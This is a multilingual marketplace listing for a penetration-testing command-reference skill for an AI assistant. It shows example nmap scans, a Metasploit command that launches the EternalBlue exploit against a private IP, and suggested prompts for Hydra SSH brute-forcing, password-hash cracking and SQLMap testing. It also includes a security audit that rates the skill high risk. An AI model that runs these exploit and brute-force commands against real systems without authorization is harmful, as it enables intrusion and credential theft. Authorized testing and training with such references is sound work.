pentest-commands
Pentest-Befehlsreferenz
Diese Fähigkeit bietet eine umfassende Befehlsreferenz für Penetration-Testing-Tools. Sie hilft Sicherheitsfachleuten, schnell Befehle für nmap, Metasploit, nikto, SQLMap, Hydra und andere Sicherheits-Testing-Tools während autorisierter Assessments nachzuschlagen.
تنزيل ZIP المهارة
رفع في Claude
اذهب إلى Settings → Capabilities → Skills → Upload skill
فعّل وابدأ الاستخدام
اختبرها
استخدام "pentest-commands". Zeige mir nmap-Befehle zum Scannen von Ports auf 192.168.1.1
النتيجة المتوقعة:
TCP SYN scan (stealth): nmap -sS 192.168.1.1
Full TCP connect scan: nmap -sT 192.168.1.1
UDP scan: nmap -sU 192.168.1.1
All ports: nmap -p- 192.168.1.1
Service versions: nmap -sV 192.168.1.1
OS detection: nmap -O 192.168.1.1
Comprehensive scan: nmap -A 192.168.1.1
استخدام "pentest-commands". Was sind die Metasploit-Befehle, um den EternalBlue-Exploit zu verwenden?
النتيجة المتوقعة:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
Or interactive: msfconsole > search type:exploit name:ms17_010
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.1.1
> exploit
التدقيق الأمني
مخاطر عاليةThis skill provides a comprehensive reference for penetration testing tools including Metasploit, nmap, nikto, SQLMap, Hydra, John the Ripper, and Aircrack-ng. The static analysis confirmed critical findings related to exploitation frameworks and password cracking tools. While this is a legitimate security testing reference for authorized use, it provides unconstrained access to dangerous tools without authorization verification. Risk Level: HIGH - Recommend restricted distribution or content modifications to add authorization safeguards.
مشكلات حرجة (2)
مشكلات عالية المخاطر (3)
مشكلات متوسطة المخاطر (2)
مشكلات منخفضة المخاطر (1)
عوامل الخطر
⚙️ الأوامر الخارجية (37)
🌐 الوصول إلى الشبكة (84)
📁 الوصول إلى نظام الملفات (2)
الأنماط المكتشفة
درجة الجودة
ماذا يمكنك بناءه
Schnellreferenz für Sicherheitsfachleute
Professionelle Penetration-Tester verwenden diese Fähigkeit als schnelles Befehlsnachschlagewerk während autorisierter Sicherheitsassessments. Die umfassende Befehlsreferenz spart Zeit beim Suchen in der Dokumentation.
Sicherheitstraining und -ausbildung
Studierende, die Penetration-Testing lernen, verwenden diese Fähigkeit, um die korrekte Befehlssyntax für verschiedene Sicherheits-Testing-Tools in Laborumgebungen zu verstehen.
Red-Team-Operationen
Red-Team-Mitglieder verwenden diese Befehlsreferenz während autorisierter Red-Team-Einsätze, um Netzwerk-Scanning-, Exploitation- und Post-Exploitation-Befehle schnell auszuführen.
جرّب هذه الموجهات
Zeige mir nmap-Befehle zum Scannen eines Zielnetzwerks 192.168.1.0/24, um aktive Hosts und offene Ports zu entdecken
Finde Metasploit-Befehle, um den EternalBlue-Exploit gegen ein Windows-Ziel zu suchen und zu verwenden
Zeige Hydra-Befehle zum Brute-Forcing von SSH-Logins und John the Ripper-Befehle zum Knacken von Passwort-Hashes
Biete nikto- und SQLMap-Befehle zum Testen einer Web-Anwendung unter http://192.168.1.100 auf Schwachstellen
أفضل الممارسات
- Stellen Sie stets sicher, dass Sie eine schriftliche Autorisierung haben, bevor Sie ein Zielsystem testen
- Verwenden Sie Timing-Vorlagen (-T4, -T5) sorgfältig, um Erkennung oder Systembelastung zu vermeiden
- Dokumentieren Sie alle ausgeführten Befehle und Ergebnisse für Penetration-Test-Berichte
تجنب
- Verwenden Sie diese Befehle niemals gegen Systeme ohne ausdrückliche Autorisierung
- Vermeiden Sie aggressive Scans, die Produktivsysteme stören könnten
- Teilen oder veröffentlichen Sie keine Ergebnisse, die böswillige Akteure unterstützen könnten